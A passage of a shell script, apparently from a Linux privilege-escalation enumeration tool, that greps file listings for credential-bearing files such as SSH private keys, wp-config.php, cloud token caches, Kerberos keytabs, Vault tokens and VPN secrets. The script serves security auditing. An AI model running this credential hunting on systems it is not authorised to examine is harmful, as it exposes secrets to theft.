"$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E '/default/settings.php' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E 'moodle/config.php' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/etc" | grep -E "system-connections$" | sort | uniq | head -n 70) + PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) + PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/etc" | grep -E "exports$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E 